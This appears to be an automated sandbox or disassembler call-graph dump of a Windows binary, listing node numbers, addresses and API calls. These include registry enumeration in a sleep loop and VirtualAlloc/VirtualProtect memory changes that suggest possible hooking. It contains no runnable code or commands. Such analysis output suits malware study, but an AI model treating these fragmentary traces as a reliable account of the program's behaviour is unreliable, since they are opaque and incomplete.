7698->7689 7699 225dc649484 7698->7699 7718 225dc64972c 7699->7718 7701 225dc64948f 7701->7689 7703 225dc6497b7 GetLastError 7702->7703 7704 225dc647f05 7702->7704 7714 225dc649b10 7703->7714 7704->7689 7704->7696 7715 225dc649930 __vcrt_InitializeCriticalSectionEx 5 API calls 7714->7715 7716 225dc649b37 TlsGetValue 7715->7716 7719 225dc649740 7718->7719 7723 225dc64975a __vcrt_freeptd 7718->7723 7720 225dc649b10 __vcrt_freeptd 6 API calls 7719->7720 7722 225dc64974a 7719->7722 7720->7722 7724 225dc649b58 7722->7724 7723->7701 7725 225dc649930 __vcrt_InitializeCriticalSectionEx 5 API calls 7724->7725 7726 225dc649b86 7725->7726 7727 225dc649b98 TlsSetValue 7726->7727 7728 225dc649b90 7726->7728 7727->7728 7728->7723 7993 225dc648376 7994 225dc649538 __std_exception_copy 30 API calls 7993->7994 7995 225dc6483a1 7994->7995 7277 225dc64f478 7278 225dc64f480 7277->7278 7279 225dc64f495 7278->7279 7280 225dc64f4ae 7278->7280 7281 225dc64b960 _set_errno_from_matherr 13 API calls 7279->7281 7284 225dc64ad0c 33 API calls 7280->7284 7285 225dc64f4a5 7280->7285 7282 225dc64f49a 7281->7282 7283 225dc64b840 _invalid_parameter_noinfo 30 API calls 7282->7283 7283->7285 7284->7285 6872 225dc64f004 6873 225dc64f023 6872->6873 6874 225dc64f09c 6873->6874 6877 225dc64f033 6873->6877 6880 225dc648620 6874->6880 6878 225dc647d60 _handle_error 8 API calls 6877->6878 6879 225dc64f092 6878->6879 6883 225dc648634 IsProcessorFeaturePresent 6880->6883 6884 225dc64864b 6883->6884 6889 225dc6486d0 RtlCaptureContext RtlLookupFunctionEntry 6884->6889 6890 225dc64865f 6889->6890 6891 225dc648700 RtlVirtualUnwind 6889->6891 6892 225dc648518 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6890->6892 6891->6890 7996 225dc64d984 GetProcessHeap 7738 225dc64ab04 7739 225dc64ab1d 7738->7739 7741 225dc64ab35 7738->7741 7740 225dc64b9f8 __free_lconv_mon 13 API calls 7739->7740 7739->7741 7740->7741 7997 225dc642b84 7999 225dc642be1 7997->7999 7998 225dc642bfc 7999->7998 8000 225dc6434ac 3 API calls 7999->8000 8000->7998 8001 225dc64b184 8002 225dc64b189 8001->8002 8003 225dc64b19e 8001->8003 8007 225dc64b1a4 8002->8007 8008 225dc64b1e6 8007->8008 8009 225dc64b1ee 8007->8009 8010 225dc64b9f8 __free_lconv_mon 13 API calls 8008->8010 8011 225dc64b9f8 __free_lconv_mon 13 API calls 8009->8011 8010->8009 8012 225dc64b1fb 8011->8012 8013 225dc64b9f8 __free_lconv_mon 13 API calls 8012->8013 8014 225dc64b208 8013->8014 8015 225dc64b9f8 __free_lconv_mon 13 API calls 8014->8015 8016 225dc64b215 8015->8016 8017 225dc64b9f8 __free_lconv_mon 13 API calls 8016->8017 8018 225dc64b222 8017->8018 8019 225dc64b9f8 __free_lconv_mon 13 API calls 8018->8019 8020 225dc64b22f 8019->8020 8021 225dc64b9f8 __free_lconv_mon 13 API calls 8020->8021 8022 225dc64b23c 8021->8022 8023 225dc64b9f8 __free_lconv_mon 13 API calls 8022->8023 8024 225dc64b249 8023->8024 8025 225dc64b9f8 __free_lconv_mon 13 API calls 8024->8025 8026 225dc64b259 8025->8026 8027 225dc64b9f8 __free_lconv_mon 13 API calls 8026->8027 8028 225dc64b269 8027->8028 8033 225dc64b054 8028->8033 8047 225dc64aebc EnterCriticalSection 8033->8047 6893 225dc644000 6895 225dc643f4d _invalid_parameter_noinfo 6893->6895 6894 225dc643f9d VirtualQuery 6894->6895 6896 225dc643fb7 6894->6896 6895->6894 6895->6896 6897 225dc644002 GetLastError 6895->6897 6897->6895 6897->6896 6712 225dc641ac8 6719 225dc641628 GetProcessHeap HeapAlloc 6712->6719 6714 225dc641ad7 6715 225dc641ade SleepEx 6714->6715 6718 225dc641598 StrCmpIW StrCmpW 6714->6718 6770 225dc6418b4 6714->6770 6716 225dc641628 50 API calls 6715->6716 6716->6714 6718->6714 6787 225dc641268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6719->6787 6721 225dc641650 6788 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6721->6788 6723 225dc641658 6789 225dc641268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6723->6789 6725 225dc641661 6790 225dc641268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6725->6790 6727 225dc64166a 6791 225dc641268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6727->6791 6729 225dc641673 6792 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6729->6792 6731 225dc64167c 6793 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6731->6793 6733 225dc641685 6794 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6733->6794 6735 225dc64168e RegOpenKeyExW 6736 225dc6418a6 6735->6736 6737 225dc6416c0 RegOpenKeyExW 6735->6737 6736->6714 6738 225dc6416e9 6737->6738 6739 225dc6416ff RegOpenKeyExW 6737->6739 6801 225dc6412bc RegQueryInfoKeyW 6738->6801 6741 225dc64173a RegOpenKeyExW 6739->6741 6742 225dc641723 6739->6742 6745 225dc641775 RegOpenKeyExW 6741->6745 6746 225dc64175e 6741->6746 6795 225dc64104c RegQueryInfoKeyW 6742->6795 6747 225dc641799 6745->6747 6748 225dc6417b0 RegOpenKeyExW 6745->6748 6750 225dc6412bc 16 API calls 6746->6750 6752 225dc6412bc 16 API calls 6747->6752 6753 225dc6417eb RegOpenKeyExW 6748->6753 6754 225dc6417d4 6748->6754 6751 225dc64176b RegCloseKey 6750->6751 6751->6745 6755 225dc6417a6 RegCloseKey 6752->6755 6757 225dc641826 RegOpenKeyExW 6753->6757 6758 225dc64180f 6753->6758 6756 225dc6412bc 16 API calls 6754->6756 6755->6748 6759 225dc6417e1 RegCloseKey 6756->6759 6761 225dc64184a 6757->6761 6762 225dc641861 RegOpenKeyExW 6757->6762 6760 225dc64104c 6 API calls 6758->6760 6759->6753 6765 225dc64181c RegCloseKey 6760->6765 6766 225dc64104c 6 API calls 6761->6766 6763 225dc64189c RegCloseKey 6762->6763 6764 225dc641885 6762->6764 6763->6736 6768 225dc64104c 6 API calls 6764->6768 6765->6757 6767 225dc641857 RegCloseKey 6766->6767 6767->6762 6769 225dc641892 RegCloseKey 6768->6769 6769->6763 6815 225dc6414a4 6770->6815 6787->6721 6788->6723 6789->6725 6790->6727 6791->6729 6792->6731 6793->6733 6794->6735 6796 225dc6411b7 RegCloseKey 6795->6796 6797 225dc6410bf 6795->6797 6796->6741 6797->6796 6798 225dc6410cf RegEnumValueW 6797->6798 6799 225dc641125 6798->6799 6799->6796 6799->6798 6800 225dc641150 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 6799->6800 6800->6799 6802 225dc64148a RegCloseKey 6801->6802 6803 225dc641327 GetProcessHeap HeapAlloc 6801->6803 6802->6739 6804 225dc641476 GetProcessHeap HeapFree 6803->6804 6805 225dc641352 RegEnumValueW 6803->6805 6804->6802 6807 225dc6413a5 6805->6807 6807->6804 6807->6805 6808 225dc6413d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 6807->6808 6809 225dc64141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 6807->6809 6810 225dc64152c 6807->6810 6808->6809 6809->6807 6811 225dc64157c 6810->6811 6814 225dc641546 6810->6814 6811->6807 6812 225dc641565 StrCmpW 6812->6814 6813 225dc64155d StrCmpIW 6813->6814 6814->6811 6814->6812 6814->6813 6816 225dc6414e1 GetProcessHeap HeapFree GetProcessHeap HeapFree 6815->6816 6817 225dc6414c1 GetProcessHeap HeapFree 6815->6817 6817->6816 6817->6817 7286 225dc649448 7293 225dc6498c4 7286->7293 7290 225dc649455 7309 225dc649bac 7293->7309 7296 225dc649451 7296->7290 7298 225dc649858 7296->7298 7297 225dc6498f8 __vcrt_uninitialize_locks DeleteCriticalSection 7297->7296 7323 225dc649a80 7298->7323 7314 225dc649930 7309->7314 7312 225dc6498dc 7312->7296 7312->7297 7313 225dc649bf7 InitializeCriticalSectionAndSpinCount 7313->7312 7315 225dc649a4a 7314->7315 7316 225dc649974 try_get_function 7314->7316 7315->7312 7315->7313 7316->7315 7317 225dc6499a2 LoadLibraryExW 7316->7317 7320 225dc649a39 GetProcAddress 7316->7320 7322 225dc6499e5 LoadLibraryExW 7316->7322 7318 225dc649a19 7317->7318 7319 225dc6499c3 GetLastError 7317->7319 7318->7320 7321 225dc649a30 FreeLibrary 7318->7321 7319->7316 7320->7315 7321->7320 7322->7316 7322->7318 7324 225dc649930 __vcrt_InitializeCriticalSectionEx 5 API calls 7323->7324 7325 225dc649aa5 TlsAlloc 7324->7325 7327 225dc64fa54 7330 225dc64cd58 7327->7330 7331 225dc64cd65 7330->7331 7332 225dc64cdaa 7330->7332 7336 225dc64b41c 7331->7336 7337 225dc64b42d 7336->7337 7342 225dc64b432 7336->7342 7339 225dc64d6e0 _invalid_parameter_noinfo 6 API calls 7337->7339 7338 225dc64d728 _invalid_parameter_noinfo 6 API calls 7340 225dc64b451 7338->7340 7339->7342 7341 225dc64b43a 7340->7341 7343 225dc64b980 _invalid_parameter_noinfo 13 API calls 7340->7343 7344 225dc64acb4 33 API calls 7341->7344 7349 225dc64b4b4 7341->7349 7342->7338 7342->7341 7345 225dc64b464 7343->7345 7346 225dc64b4c2 7344->7346 7347 225dc64b482 7345->7347 7348 225dc64b472 7345->7348 7350 225dc64d728 _invalid_parameter_noinfo 6 API calls 7347->7350 7351 225dc64d728 _invalid_parameter_noinfo 6 API calls 7348->7351 7361 225dc64cae0 7349->7361 7352 225dc64b48a 7350->7352 7353 225dc64b479 7351->7353 7354 225dc64b48e 7352->7354 7355 225dc64b4a0 7352->7355 7358 225dc64b9f8 __free_lconv_mon 13 API calls 7353->7358 7356 225dc64d728 _invalid_parameter_noinfo 6 API calls 7354->7356 7357 225dc64b0b4 _invalid_parameter_noinfo 13 API calls 7355->7357 7356->7353 7359 225dc64b4a8 7357->7359 7358->7341 7360 225dc64b9f8 __free_lconv_mon 13 API calls 7359->7360 7360->7341 7379 225dc64cca0 7361->7379 7363 225dc64cb09 7394 225dc64c7ec 7363->7394 7366 225dc64cb23 7366->7332 7368 225dc64cbcf 7369 225dc64b9f8 __free_lconv_mon 13 API calls 7368->7369 7369->7366 7373 225dc64cbca 7374 225dc64b960 _set_errno_from_matherr 13 API calls 7373->7374 7374->7368 7375 225dc64cc2c 7375->7368 7419 225dc64c630 7375->7419 7376 225dc64cbef 7376->7375 7377 225dc64b9f8 __free_lconv_mon 13 API calls 7376->7377 7377->7375 7380 225dc64ccc3 7379->7380 7381 225dc64cccd 7380->7381 7434 225dc64aebc EnterCriticalSection 7380->7434 7383 225dc64cd3f 7381->7383 7386 225dc64acb4 33 API calls 7381->7386 7383->7363 7387 225dc64cd57 7386->7387 7389 225dc64cdaa 7387->7389 7391 225dc64b41c 33 API calls 7387->7391 7389->7363 7392 225dc64cd94 7391->7392 7393 225dc64cae0 43 API calls 7392->7393 7393->7389 7395 225dc64ad0c 33 API calls 7394->7395 7396 225dc64c800 7395->7396 7397 225dc64c80c GetOEMCP 7396->7397 7398 225dc64c81e 7396->7398 7399 225dc64c833 7397->7399 7398->7399 7400 225dc64c823 GetACP 7398->7400 7399->7366 7401 225dc64af2c 7399->7401 7400->7399 7402 225dc64af77 7401->7402 7406 225dc64af3b _invalid_parameter_noinfo 7401->7406 7404 225dc64b960 _set_errno_from_matherr 13 API calls 7402->7404 7403 225dc64af5e HeapAlloc 7405 225dc64af75 7403->7405 7403->7406 7404->7405 7405->7368 7408 225dc64cdd4 7405->7408 7406->7402 7406->7403 7407 225dc649e44 _invalid_parameter_noinfo 2 API calls 7406->7407 7407->7406 7409 225dc64c7ec 35 API calls 7408->7409 7410 225dc64cdff 7409->7410 7412 225dc64ce3c IsValidCodePage 7410->7412 7416 225dc64ce7f _invalid_parameter_noinfo 7410->7416 7411 225dc647d60 _handle_error 8 API calls 7413 225dc64cbc3 7411->7413 7414 225dc64ce4d 7412->7414 7412->7416 7413->7373 7413->7376 7415 225dc64ce84 GetCPInfo 7414->7415 7418 225dc64ce56 _invalid_parameter_noinfo 7414->7418 7415->7416 7415->7418 7416->7411 7435 225dc64c8fc 7418->7435 7506 225dc64aebc EnterCriticalSection 7419->7506 7436 225dc64c939 GetCPInfo 7435->7436 7445 225dc64ca2f 7435->7445 7442 225dc64c94c 7436->7442 7436->7445 7437 225dc647d60 _handle_error 8 API calls 7439 225dc64cac8 7437->7439 7439->7416 7446 225dc64f514 7442->7446 7444 225dc64f9bc 37 API calls 7444->7445 7445->7437 7447 225dc64ad0c 33 API calls 7446->7447 7448 225dc64f556 7447->7448 7449 225dc64d144 MultiByteToWideChar 7448->7449 7451 225dc64f58c 7449->7451 7450 225dc64f593 7453 225dc647d60 _handle_error 8 API calls 7450->7453 7451->7450 7452 225dc64af2c 14 API calls 7451->7452 7454 225dc64f5b8 _invalid_parameter_noinfo 7451->7454 7452->7454 7455 225dc64c9c3 7453->7455 7456 225dc64f650 7454->7456 7457 225dc64d144 MultiByteToWideChar 7454->7457 7461 225dc64f9bc 7455->7461 7456->7450 7458 225dc64b9f8 __free_lconv_mon 13 API calls 7456->7458 7459 225dc64f632 7457->7459 7458->7450 7459->7456 7460 225dc64f636 GetStringTypeW 7459->7460 7460->7456 7462 225dc64ad0c 33 API calls 7461->7462 7463 225dc64f9e1 7462->7463 7466 225dc64f6a4 7463->7466 7467 225dc64f6e6 7466->7467 7468 225dc64d144 MultiByteToWideChar 7467->7468 7471 225dc64f730 7468->7471 7469 225dc647d60 _handle_error 8 API calls 7470 225dc64c9f6 7469->7470 7470->7444 7472 225dc64af2c 14 API calls 7471->7472 7476 225dc64f96f 7471->7476 7477 225dc64f763 7471->7477 7472->7477 7473 225dc64d144 MultiByteToWideChar 7475 225dc64f7d5 7473->7475 7474 225dc64f867 7474->7476 7478 225dc64b9f8 __free_lconv_mon 13 API calls 7474->7478 7475->7474 7494 225dc64d7e0 7475->7494 7476->7469 7477->7473 7477->7474 7478->7476 7481 225dc64f876 7483 225dc64af2c 14 API calls 7481->7483 7486 225dc64f890 7481->7486 7482 225dc64f824 7482->7474 7484 225dc64d7e0 6 API calls 7482->7484 7483->7486 7484->7474 7485 225dc64d7e0 6 API calls 7488 225dc64f911 7485->7488 7486->7474 7486->7485 7487 225dc64f946 7487->7474 7489 225dc64b9f8 __free_lconv_mon 13 API calls 7487->7489 7488->7487 7500 225dc64d1a0 7488->7500 7489->7474 7495 225dc64d3ec try_get_function 5 API calls 7494->7495 7496 225dc64d81e 7495->7496 7497 225dc64d823 7496->7497 7503 225dc64d8bc 7496->7503 7497->7474 7497->7481 7497->7482 7499 225dc64d87f LCMapStringW 7499->7497 7501 225dc64d1c3 WideCharToMultiByte 7500->7501 7504 225dc64d3ec try_get_function 5 API calls 7503->7504 7505 225dc64d8ea 7504->7505 7505->7499 8049 225dc64d354 8050 225dc64d376 8049->8050 8051 225dc64d393 8049->8051 8050->8051 8052 225dc64d384 8050->8052 8053 225dc64d39d 8051->8053 8058 225dc64fa6c 8051->8058 8054 225dc64b960 _set_errno_from_matherr 13 API calls 8052->8054 8065 225dc64faa8 8053->8065 8056 225dc64d389 _invalid_parameter_noinfo 8054->8056 8059 225dc64fa75 8058->8059 8060 225dc64fa8e HeapSize 8058->8060 8061 225dc64b960 _set_errno_from_matherr 13 API calls 8059->8061 8062 225dc64fa7a 8061->8062 8063 225dc64b840 _invalid_parameter_noinfo 30 API calls 8062->8063 8064 225dc64fa85 8063->8064 8064->8053 8066 225dc64fac7 8065->8066 8067 225dc64fabd 8065->8067 8068 225dc64facc 8066->8068 8076 225dc64fad3 _invalid_parameter_noinfo 8066->8076 8069 225dc64af2c 14 API calls 8067->8069 8070 225dc64b9f8 __free_lconv_mon 13 API calls 8068->8070 8074 225dc64fac5 8069->8074 8070->8074 8071 225dc64fad9 8073 225dc64b960 _set_errno_from_matherr 13 API calls 8071->8073 8072 225dc64fb06 HeapReAlloc 8072->8074 8072->8076 8073->8074 8074->8056 8075 225dc649e44 _invalid_parameter_noinfo 2 API calls 8075->8076 8076->8071 8076->8072 8076->8075 6898 225dc6483d4 6901 225dc649538 6898->6901 6900 225dc6483fd 6902 225dc64958e __vcrt_freeptd 6901->6902 6903 225dc649559 6901->6903 6902->6900 6903->6902 6905 225dc64ac54 6903->6905 6906 225dc64ac61 6905->6906 6907 225dc64ac6b 6905->6907 6906->6907 6912 225dc64ac86 6906->6912 6914 225dc64b960 6907->6914 6909 225dc64ac72 6917 225dc64b840 6909->6917 6911 225dc64ac7e 6911->6902 6912->6911 6913 225dc64b960 _set_errno_from_matherr 13 API calls 6912->6913 6913->6909 6920 225dc64b4c4 GetLastError 6914->6920 6916 225dc64b969 6916->6909 7001 225dc64b790 6917->7001 6921 225dc64b4e6 6920->6921 6925 225dc64b4eb 6920->6925 6943 225dc64d6e0 6921->6943 6926 225dc64b4f3 SetLastError 6925->6926 6947 225dc64d728 6925->6947 6926->6916 6930 225dc64b53f 6933 225dc64d728 _invalid_parameter_noinfo 6 API calls 6930->6933 6931 225dc64b52f 6932 225dc64d728 _invalid_parameter_noinfo 6 API calls 6931->6932 6934 225dc64b536 6932->6934 6935 225dc64b547 6933->6935 6959 225dc64b9f8 6934->6959 6936 225dc64b54b 6935->6936 6937 225dc64b55d 6935->6937 6938 225dc64d728 _invalid_parameter_noinfo 6 API calls 6936->6938 6964 225dc64b0b4 6937->6964 6938->6934 6969 225dc64d3ec 6943->6969 6948 225dc64d3ec try_get_function 5 API calls 6947->6948 6949 225dc64d756 6948->6949 6950 225dc64d768 TlsSetValue 6949->6950 6951 225dc64b50e 6949->6951 6950->6951 6951->6926 6952 225dc64b980 6951->6952 6957 225dc64b991 _invalid_parameter_noinfo 6952->6957 6953 225dc64b9e2 6956 225dc64b960 _set_errno_from_matherr 12 API calls 6953->6956 6954 225dc64b9c6 HeapAlloc 6955 225dc64b521 6954->6955 6954->6957 6955->6930 6955->6931 6956->6955 6957->6953 6957->6954 6978 225dc649e44 6957->6978 6960 225dc64b9fd HeapFree 6959->6960 6962 225dc64ba2f 6959->6962 6961 225dc64ba18 6960->6961 6960->6962 6963 225dc64b960 _set_errno_from_matherr 12 API calls 6961->6963 6962->6926 6963->6962 6987 225dc64af8c 6964->6987 6970 225dc64d44d TlsGetValue 6969->6970 6976 225dc64d448 try_get_function 6969->6976 6971 225dc64d530 6971->6970 6974 225dc64d53e GetProcAddress 6971->6974 6972 225dc64d47c LoadLibraryExW 6973 225dc64d49d GetLastError 6972->6973 6972->6976 6973->6976 6974->6970 6975 225dc64d515 FreeLibrary 6975->6976 6976->6970 6976->6971 6976->6972 6976->6975 6977 225dc64d4d7 LoadLibraryExW 6976->6977 6977->6976 6981 225dc649e74 6978->6981 6986 225dc64aebc EnterCriticalSection 6981->6986 6999 225dc64aebc EnterCriticalSection 6987->6999 7002 225dc64b4c4 _invalid_parameter_noinfo 13 API calls 7001->7002 7003 225dc64b7b5 7002->7003 7004 225dc64b7c6 7003->7004 7009 225dc64b860 IsProcessorFeaturePresent 7003->7009 7004->6911 7010 225dc64b873 7009->7010 7013 225dc64b62c 7010->7013 7014 225dc64b666 _invalid_parameter_noinfo 7013->7014 7015 225dc64b68e RtlCaptureContext RtlLookupFunctionEntry 7014->7015 7016 225dc64b6c8 RtlVirtualUnwind 7015->7016 7017 225dc64b6fe IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7015->7017 7016->7017 7018 225dc64b750 _invalid_parameter_noinfo 7017->7018 7019 225dc647d60 _handle_error 8 API calls 7018->7019 7020 225dc64b76f GetCurrentProcess TerminateProcess 7019->7020 7507 225dc645654 7508 225dc64565a 7507->7508 7519 225dc647c90 7508->7519 7513 225dc645757 _invalid_parameter_noinfo 7515 225dc6458dd 7513->7515 7517 225dc6456be 7513->7517 7532 225dc647860 7513->7532 7514 225dc6459db 7515->7514 7516 225dc645a57 VirtualProtect 7515->7516 7516->7517 7518 225dc645a83 GetLastError 7516->7518 7518->7517 7520 225dc647c9b 7519->7520 7521 225dc64569d 7520->7521 7522 225dc649e44 _invalid_parameter_noinfo 2 API calls 7520->7522 7523 225dc647cba 7520->7523 7521->7517 7528 225dc6440e0 7521->7528 7522->7520 7527 225dc647cc5 7523->7527 7538 225dc6484bc 7523->7538 7542 225dc6484dc 7527->7542 7529 225dc6440fd 7528->7529 7531 225dc64416c _invalid_parameter_noinfo 7529->7531 7551 225dc644350 7529->7551 7531->7513 7533 225dc6478a7 7532->7533 7576 225dc647630 7533->7576 7536 225dc647d60 _handle_error 8 API calls 7537 225dc6478d1 7536->7537 7537->7513 7539 225dc6484ca std::bad_alloc::bad_alloc 7538->7539 7546 225dc6495f0 7539->7546 7541 225dc6484db 7543 225dc6484ea std::bad_alloc::bad_alloc 7542->7543 7544 225dc6495f0 Concurrency::cancel_current_task 2 API calls 7543->7544 7545 225dc647ccb 7544->7545 7547 225dc64962c RtlPcToFileHeader 7546->7547 7548 225dc64960f 7546->7548 7549 225dc649653 RaiseException 7547->7549 7550 225dc649644 7547->7550 7548->7547 7549->7541 7550->7549 7552 225dc644397 7551->7552 7553 225dc644374 7551->7553 7556 225dc6443cd 7552->7556 7571 225dc643f30 7552->7571 7553->7552 7565 225dc643e00 7553->7565 7557 225dc643f30 2 API calls 7556->7557 7560 225dc6443fd 7556->7560 7557->7560 7558 225dc64444f 7563 225dc64446b 7558->7563 7564 225dc643f30 2 API calls 7558->7564 7559 225dc644433 7559->7558 7562 225dc643e00 3 API calls 7559->7562 7560->7559 7561 225dc643e00 3 API calls 7560->7561 7561->7559 7562->7558 7563->7531 7564->7563 7567 225dc643e21 _invalid_parameter_noinfo 7565->7567 7566 225dc643e90 7566->7552 7567->7566 7568 225dc643e76 VirtualQuery 7567->7568 7569 225dc643eaa VirtualAlloc 7567->7569 7568->7566 7568->7567 7569->7566 7570 225dc643edb GetLastError 7569->7570 7570->7566 7570->7567 7573 225dc643f48 _invalid_parameter_noinfo 7571->7573 7572 225dc643f9d VirtualQuery 7572->7573 7574 225dc643fb7 7572->7574 7573->7572 7573->7574 7575 225dc644002 GetLastError 7573->7575 7574->7556 7575->7573 7575->7574 7577 225dc64764b 7576->7577 7578 225dc647661 SetLastError 7577->7578 7579 225dc64766f 7577->7579 7578->7579 7579->7536 7580 225dc647c50 7581 225dc647c6c 7580->7581 7582 225dc647c71 7580->7582 7584 225dc647d80 7581->7584 7585 225dc647e17 7584->7585 7586 225dc647da3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7584->7586 7585->7582 7586->7585 8077 225dc64bd50 8078 225dc64bd76 8077->8078 8087 225dc64bd8c 8077->8087 8079 225dc64b960 _set_errno_from_matherr 13 API calls 8078->8079 8080 225dc64bd7b 8079->8080 8082 225dc64b840 _invalid_parameter_noinfo 30 API calls 8080->8082 8081 225dc64bdf9 8084 225dc64a4a0 13 API calls 8081->8084 8083 225dc64bd85 8082->8083 8089 225dc64be6c 8084->8089 8085 225dc64bee1 8088 225dc64b9f8 __free_lconv_mon 13 API calls 8085->8088 8087->8081 8094 225dc64bdec 8087->8094 8098 225dc64bf5c 8087->8098 8088->8094 8089->8085 8095 225dc64bf44 8089->8095 8120 225dc64ef30 8089->8120 8090 225dc64bf22 8091 225dc64b9f8 __free_lconv_mon 13 API calls 8090->8091 8091->8083 8092 225dc64b9f8 __free_lconv_mon 13 API calls 8092->8094 8094->8090 8094->8092 8096 225dc64b860 _invalid_parameter_noinfo 17 API calls 8095->8096 8097 225dc64bf58 8096->8097 8099 225dc64bf8a 8098->8099 8099->8099 8100 225dc64b980 _invalid_parameter_noinfo 13 API calls 8099->8100 8101 225dc64bfd5 8100->8101 8102 225dc64ef30 30 API calls 8101->8102 8103 225dc64c00b 8102->8103 8104 225dc64b860 _invalid_parameter_noinfo 17 API calls 8103->8104 8105 225dc64c0e2 8104->8105 8106 225dc64ad0c 33 API calls 8105->8106 8107 225dc64c1bf 8106->8107 8108 225dc64d614 5 API calls 8107->8108 8109 225dc64c1ed 8108->8109 8129 225dc64ba4c 8109->8129 8112 225dc64c270 8113 225dc64ad0c 33 API calls 8112->8113 8114 225dc64c2a3 8113->8114 8115 225dc64d614 5 API calls 8114->8115 8116 225dc64c2cb 8115->8116 8151 225dc64bbc4 8116->8151 8119 225dc64bf5c 38 API calls 8123 225dc64ef48 8120->8123 8121 225dc64ef4d 8122 225dc64b960 _set_errno_from_matherr 13 API calls 8121->8122 8126 225dc64ef63 8121->8126 8128 225dc64ef57 8122->8128 8123->8121 8124 225dc64ef92 8123->8124 8123->8126 8124->8126 8127 225dc64b960 _set_errno_from_matherr 13 API calls 8124->8127 8125 225dc64b840 _invalid_parameter_noinfo 30 API calls 8125->8126 8126->8089 8127->8128 8128->8125 8130 225dc64ba75 8129->8130 8131 225dc64ba97 8129->8131 8134 225dc64b9f8 __free_lconv_mon 13 API calls 8130->8134 8140 225dc64ba83 FindFirstFileExW 8130->8140 8132 225dc64ba9b 8131->8132 8133 225dc64baf0 8131->8133 8136 225dc64baaf 8132->8136 8139 225dc64b9f8 __free_lconv_mon 13 API calls 8132->8139 8132->8140 8135 225dc64d144 MultiByteToWideChar 8133->8135 8134->8140 8145 225dc64bb0b 8135->8145 8137 225dc64af2c 14 API calls 8136->8137 8137->8140 8138 225dc64bb12 GetLastError 8141 225dc64b8f0 13 API calls 8138->8141 8139->8136 8140->8112 8144 225dc64bb1f 8141->8144 8142 225dc64bb4b 8142->8140 8143 225dc64d144 MultiByteToWideChar 8142->8143 8149 225dc64bb93 8143->8149 8150 225dc64b960 _set_errno_from_matherr 13 API calls 8144->8150 8145->8138 8145->8142 8146 225dc64bb3f 8145->8146 8147 225dc64b9f8 __free_lconv_mon 13 API calls 8145->8147 8148 225dc64af2c 14 API calls 8146->8148 8147->8146 8148->8142 8149->8138 8149->8140 8150->8140 8152 225dc64bc0f 8151->8152 8153 225dc64bbed 8151->8153 8154 225dc64bc68 8152->8154 8155 225dc64bc14 8152->8155 8156 225dc64b9f8 __free_lconv_mon 13 API calls 8153->8156 8162 225dc64bbfb 8153->8162 8157 225dc64d1a0 WideCharToMultiByte 8154->8157 8158 225dc64bc28 8155->8158 8161 225dc64b9f8 __free_lconv_mon 13 API calls 8155->8161 8155->8162 8156->8162 8165 225dc64bc8c 8157->8165 8159 225dc64af2c 14 API calls 8158->8159 8159->8162 8160 225dc64bc93 GetLastError 8163 225dc64b8f0 13 API calls 8160->8163 8161->8158 8162->8119 8168 225dc64bca0 8163->8168 8164 225dc64bcce 8164->8162 8167 225dc64d1a0 WideCharToMultiByte 8164->8167 8165->8160 8165->8164 8166 225dc64bcc3 8165->8166 8169 225dc64b9f8 __free_lconv_mon 13 API calls 8165->8169 8170 225dc64af2c 14 API calls 8166->8170 8171 225dc64bd1f 8167->8171 8172 225dc64b960 _set_errno_from_matherr 13 API calls 8168->8172 8169->8166 8170->8164 8171->8160 8171->8162 8172->8162 8173 225dc64a150 8174 225dc64a1b7 8173->8174 8175 225dc64a16d GetModuleHandleW 8173->8175 8188 225dc64a048 8174->8188 8175->8174 8177 225dc64a17a 8175->8177 8177->8174 8183 225dc64a258 GetModuleHandleExW 8177->8183 8184 225dc64a295 8183->8184 8185 225dc64a27e GetProcAddress 8183->8185 8186 225dc64a2a7 FreeLibrary 8184->8186 8187 225dc64a2ad 8184->8187 8185->8184 8186->8187 8187->8174 8202 225dc64aebc EnterCriticalSection 8188->8202 6706 225dc643ed9 6707 225dc643e26 _invalid_parameter_noinfo 6706->6707 6708 225dc643e76 VirtualQuery 6707->6708 6709 225dc643eaa VirtualAlloc 6707->6709 6711 225dc643e90 6707->6711 6708->6707 6708->6711 6710 225dc643edb GetLastError 6709->6710 6709->6711 6710->6707 6710->6711 7742 225dc645cd9 7743 225dc645ce0 VirtualProtect 7742->7743 7744 225dc645d09 GetLastError 7743->7744 7745 225dc645bf0 7743->7745 7744->7745 7587 225dc652a61 __scrt_dllmain_exception_filter 7021 225dc64dbe4 7022 225dc64dbf0 7021->7022 7023 225dc64dc17 7022->7023 7025 225dc64fc7c 7022->7025 7026 225dc64fc81 7025->7026 7030 225dc64fcbc 7025->7030 7027 225dc64fca2 DeleteCriticalSection 7026->7027 7028 225dc64fcb4 7026->7028 7027->7027 7027->7028 7029 225dc64b9f8 __free_lconv_mon 13 API calls 7028->7029 7029->7030 7030->7022 7746 225dc64aaac 7749 225dc64a878 7746->7749 7756 225dc64a840 7749->7756 7757 225dc64a855 7756->7757 7758 225dc64a850 7756->7758 7760 225dc64a85c 7757->7760 7759 225dc64a7fc 13 API calls 7758->7759 7759->7757 7761 225dc64a86c 7760->7761 7762 225dc64a871 7760->7762 7763 225dc64a7fc 13 API calls 7761->7763 7764 225dc64a7fc 7762->7764 7763->7762 7765 225dc64a832 7764->7765 7766 225dc64a801 7764->7766 7767 225dc64a82a 7766->7767 7768 225dc64b9f8 __free_lconv_mon 13 API calls 7766->7768 7769 225dc64b9f8 __free_lconv_mon 13 API calls 7767->7769 7768->7766 7769->7765 7770 225dc6516ab 7772 225dc651950 7770->7772 7773 225dc6516eb 7770->7773 7771 225dc651946 7772->7771 7777 225dc652230 _log10_special 22 API calls 7772->7777 7773->7772 7774 225dc65171f 7773->7774 7775 225dc651932 7773->7775 7778 225dc652230 7775->7778 7777->7771 7781 225dc652250 7778->7781 7783 225dc65226a 7781->7783 7782 225dc65224b 7782->7771 7783->7782 7785 225dc652094 7783->7785 